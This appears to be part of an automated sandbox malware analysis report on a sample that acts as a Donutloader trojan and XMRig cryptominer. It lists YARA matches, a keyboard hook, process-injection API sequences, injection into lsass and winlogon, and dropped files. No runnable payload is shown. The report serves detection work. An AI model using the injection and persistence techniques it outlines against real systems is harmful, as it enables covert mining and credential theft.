        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard%s

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Installs a global keyboard hook
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
        Source: 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1510372978.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1490294728.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1492275711.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1480698288.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1514543598.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
        Source: 0000001D.00000003.1483759497.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
        Source: 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1473812913.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
        Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
        Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
        Source: 0000001D.00000003.1501988421.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1482207840.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1506306957.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1464746998.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: Process Memory Space: conhost.exe PID: 7536, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: C:\Users\user\AppData\Local\Temp\paint.exeCode function: 10_2_00401D58 NtAllocateVirtualMemory,10_2_00401D58
        Source: C:\Users\user\AppData\Local\Temp\paint.exeCode function: 10_2_00401D18 NtWriteVirtualMemory,10_2_00401D18
        Source: C:\Users\user\AppData\Local\Temp\paint.exeCode function: 10_2_004019D8 NtCreateThreadEx,10_2_004019D8
        Source: C:\Users\user\AppData\Local\Temp\paint.exeCode function: 10_2_00401D98 NtProtectVirtualMemory,10_2_00401D98
        Source: C:\Users\user\AppData\Local\Temp\paint.exeCode function: 10_2_00401C98 NtClose,10_2_00401C98
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 31_2_00401D58 NtAllocateVirtualMemory,31_2_00401D58
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 31_2_00401D18 NtWriteVirtualMemory,31_2_00401D18
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 31_2_004019D8 NtCreateThreadEx,31_2_004019D8
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 31_2_00401D98 NtProtectVirtualMemory,31_2_00401D98
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 31_2_00401C98 NtClose,31_2_00401C98
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,94_2_0000000140001868
        Source: C:\Windows\System32\dllhost.exeCode function: 95_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,95_2_0000000140001868
        Source: C:\Windows\System32\dllhost.exeCode function: 97_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,97_2_0000000140001868
        Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_3fc24ylm.ndk.ps1
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeCode function: 1_2_00007FF7C14305401_2_00007FF7C1430540
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeCode function: 1_2_00007FF7C1430B401_2_00007FF7C1430B40
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeCode function: 1_2_00007FF7C14305081_2_00007FF7C1430508
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeCode function: 1_2_00007FF7C143089D1_2_00007FF7C143089D
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeCode function: 1_2_00007FF7C14305001_2_00007FF7C1430500
        Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000025EE91B23F018_3_0000025EE91B23F0
        Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000025EE91BCC9418_3_0000025EE91BCC94
        Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000025EE91BCE1818_3_0000025EE91BCE18
        Source: C:\Windows\System32\conhost.exeCode function: 19_3_000001AD31C9CC9419_3_000001AD31C9CC94
        Source: C:\Windows\System32\conhost.exeCode function: 19_3_000001AD31C923F019_3_000001AD31C923F0
        Source: C:\Windows\System32\conhost.exeCode function: 19_3_000001AD31C9CE1819_3_000001AD31C9CE18
        Source: C:\Windows\System32\conhost.exeCode function: 20_2_00000113DB11E10620_2_00000113DB11E106
        Source: C:\Windows\System32\conhost.exeCode function: 20_2_00000113DB11E4D620_2_00000113DB11E4D6
        Source: C:\Windows\System32\conhost.exeCode function: 20_2_00000113DB11E90E20_2_00000113DB11E90E
        Source: C:\Windows\System32\conhost.exeCode function: 20_2_00000113DB11D4D220_2_00000113DB11D4D2
        Source: C:\Windows\System32\conhost.exeCode function: 20_2_00000113DB11ED6A20_2_00000113DB11ED6A
        Source: C:\Windows\System32\conhost.exeCode function: 20_2_00007FF7C14D50F620_2_00007FF7C14D50F6
        Source: C:\Windows\System32\conhost.exeCode function: 20_2_00007FF7C14D5EA220_2_00007FF7C14D5EA2
        Source: C:\Windows\System32\conhost.exeCode function: 30_2_0000021E7B55E4D630_2_0000021E7B55E4D6
        Source: C:\Windows\System32\conhost.exeCode function: 30_2_0000021E7B55E10630_2_0000021E7B55E106
        Source: C:\Windows\System32\conhost.exeCode function: 30_2_0000021E7B55ED6A30_2_0000021E7B55ED6A
        Source: C:\Windows\System32\conhost.exeCode function: 30_2_0000021E7B55D4D230_2_0000021E7B55D4D2
        Source: C:\Windows\System32\conhost.exeCode function: 30_2_0000021E7B55E90E30_2_0000021E7B55E90E
        Source: C:\Windows\System32\conhost.exeCode function: 30_2_00007FF7C14E50F630_2_00007FF7C14E50F6
        Source: C:\Windows\System32\conhost.exeCode function: 30_2_00007FF7C14E5EA230_2_00007FF7C14E5EA2
        Source: C:\Windows\System32\conhost.exeCode function: 36_3_00000236C6DCCE1836_3_00000236C6DCCE18
        Source: C:\Windows\System32\conhost.exeCode function: 36_3_00000236C6DC23F036_3_00000236C6DC23F0
        Source: C:\Windows\System32\conhost.exeCode function: 36_3_00000236C6DCCC9436_3_00000236C6DCCC94
        Source: C:\Windows\System32\cmd.exeCode function: 44_3_0000015829E723F044_3_0000015829E723F0
        Source: C:\Windows\System32\cmd.exeCode function: 44_3_0000015829E7CE1844_3_0000015829E7CE18
        Source: C:\Windows\System32\cmd.exeCode function: 44_3_0000015829E7CC9444_3_0000015829E7CC94
        Source: C:\Windows\System32\conhost.exeCode function: 45_3_000001D643A6CE1845_3_000001D643A6CE18
        Source: C:\Windows\System32\conhost.exeCode function: 45_3_000001D643A6CC9445_3_000001D643A6CC94
        Source: C:\Windows\System32\conhost.exeCode function: 45_3_000001D643A623F045_3_000001D643A623F0
        Source: C:\Windows\System32\conhost.exeCode function: 58_3_000002063182CE1858_3_000002063182CE18
        Source: C:\Windows\System32\conhost.exeCode function: 58_3_000002063182CC9458_3_000002063182CC94
        Source: C:\Windows\System32\conhost.exeCode function: 58_3_00000206318223F058_3_00000206318223F0
        Source: C:\Windows\System32\conhost.exeCode function: 69_3_000001CCE36423F069_3_000001CCE36423F0
        Source: C:\Windows\System32\conhost.exeCode function: 69_3_000001CCE364CE1869_3_000001CCE364CE18
        Source: C:\Windows\System32\conhost.exeCode function: 69_3_000001CCE364CC9469_3_000001CCE364CC94
        Source: C:\Windows\System32\conhost.exeCode function: 70_3_000001858EA1CC9470_3_000001858EA1CC94
        Source: C:\Windows\System32\conhost.exeCode function: 70_3_000001858EA123F070_3_000001858EA123F0
        Source: C:\Windows\System32\conhost.exeCode function: 70_3_000001858EA1CE1870_3_000001858EA1CE18
        Source: C:\Windows\System32\conhost.exeCode function: 73_3_000002942EBECE1873_3_000002942EBECE18
        Source: C:\Windows\System32\conhost.exeCode function: 73_3_000002942EBE23F073_3_000002942EBE23F0
        Source: C:\Windows\System32\conhost.exeCode function: 73_3_000002942EBECC9473_3_000002942EBECC94
        Source: C:\Windows\System32\conhost.exeCode function: 83_3_000001C8A038CE1883_3_000001C8A038CE18
        Source: C:\Windows\System32\conhost.exeCode function: 83_3_000001C8A03823F083_3_000001C8A03823F0
        Source: C:\Windows\System32\conhost.exeCode function: 83_3_000001C8A038CC9483_3_000001C8A038CC94
        Source: C:\Windows\System32\conhost.exeCode function: 87_3_000001E5EF03CC9487_3_000001E5EF03CC94
        Source: C:\Windows\System32\conhost.exeCode function: 87_3_000001E5EF0323F087_3_000001E5EF0323F0
        Source: C:\Windows\System32\conhost.exeCode function: 87_3_000001E5EF03CE1887_3_000001E5EF03CE18
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_0000000140001CF094_2_0000000140001CF0
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_0000000140002D4C94_2_0000000140002D4C
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_000000014000127494_2_0000000140001274
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_000000014000243494_2_0000000140002434
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_000000014000320494_2_0000000140003204
        Source: C:\Windows\System32\dllhost.exeCode function: 95_2_0000000140001CF095_2_0000000140001CF0
        Source: C:\Windows\System32\dllhost.exeCode function: 95_2_0000000140002D4C95_2_0000000140002D4C
        Source: C:\Windows\System32\dllhost.exeCode function: 95_2_000000014000127495_2_0000000140001274
        Source: C:\Windows\System32\dllhost.exeCode function: 95_2_000000014000243495_2_0000000140002434
        Source: C:\Windows\System32\dllhost.exeCode function: 95_2_000000014000320495_2_0000000140003204
        Source: C:\Windows\System32\dllhost.exeCode function: 96_3_000002ADD62323F096_3_000002ADD62323F0
        Source: C:\Windows\System32\dllhost.exeCode function: 96_3_000002ADD623CC9496_3_000002ADD623CC94
        Source: C:\Windows\System32\dllhost.exeCode function: 96_3_000002ADD623CE1896_3_000002ADD623CE18
        Source: C:\Windows\System32\dllhost.exeCode function: 97_2_0000000140001CF097_2_0000000140001CF0
        Source: C:\Windows\System32\dllhost.exeCode function: 97_2_0000000140002D4C97_2_0000000140002D4C
        Source: C:\Windows\System32\dllhost.exeCode function: 97_2_000000014000127497_2_0000000140001274
        Source: C:\Windows\System32\dllhost.exeCode function: 97_2_000000014000243497_2_0000000140002434
        Source: C:\Windows\System32\dllhost.exeCode function: 97_2_000000014000320497_2_0000000140003204
        Source: C:\Windows\System32\conhost.exeCode function: 99_3_0000021C0EE5CE1899_3_0000021C0EE5CE18
        Source: C:\Windows\System32\conhost.exeCode function: 99_3_0000021C0EE5CC9499_3_0000021C0EE5CC94
        Source: C:\Windows\System32\conhost.exeCode function: 99_3_0000021C0EE523F099_3_0000021C0EE523F0
        Source: C:\Windows\System32\winlogon.exeCode function: 101_3_000001FC603823F0101_3_000001FC603823F0
        Source: C:\Windows\System32\winlogon.exeCode function: 101_3_000001FC6038CC94101_3_000001FC6038CC94
        Source: C:\Windows\System32\winlogon.exeCode function: 101_3_000001FC6038CE18101_3_000001FC6038CE18
        Source: C:\Windows\System32\lsass.exeCode function: 103_3_00000161C734CC94103_3_00000161C734CC94
        Source: C:\Windows\System32\lsass.exeCode function: 103_3_00000161C73423F0103_3_00000161C73423F0
        Source: C:\Windows\System32\lsass.exeCode function: 103_3_00000161C734CE18103_3_00000161C734CE18
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6140 -s 1052
        Source: e7WMhx18XN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2684
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2682
        Source: unknownProcess created: Commandline size = 5434
        Source: unknownProcess created: Commandline size = 5297
        Source: unknownProcess created: Commandline size = 5277
        Source: unknownProcess created: Commandline size = 5288
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2684Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2682
        Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
        Source: 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1510372978.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1490294728.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
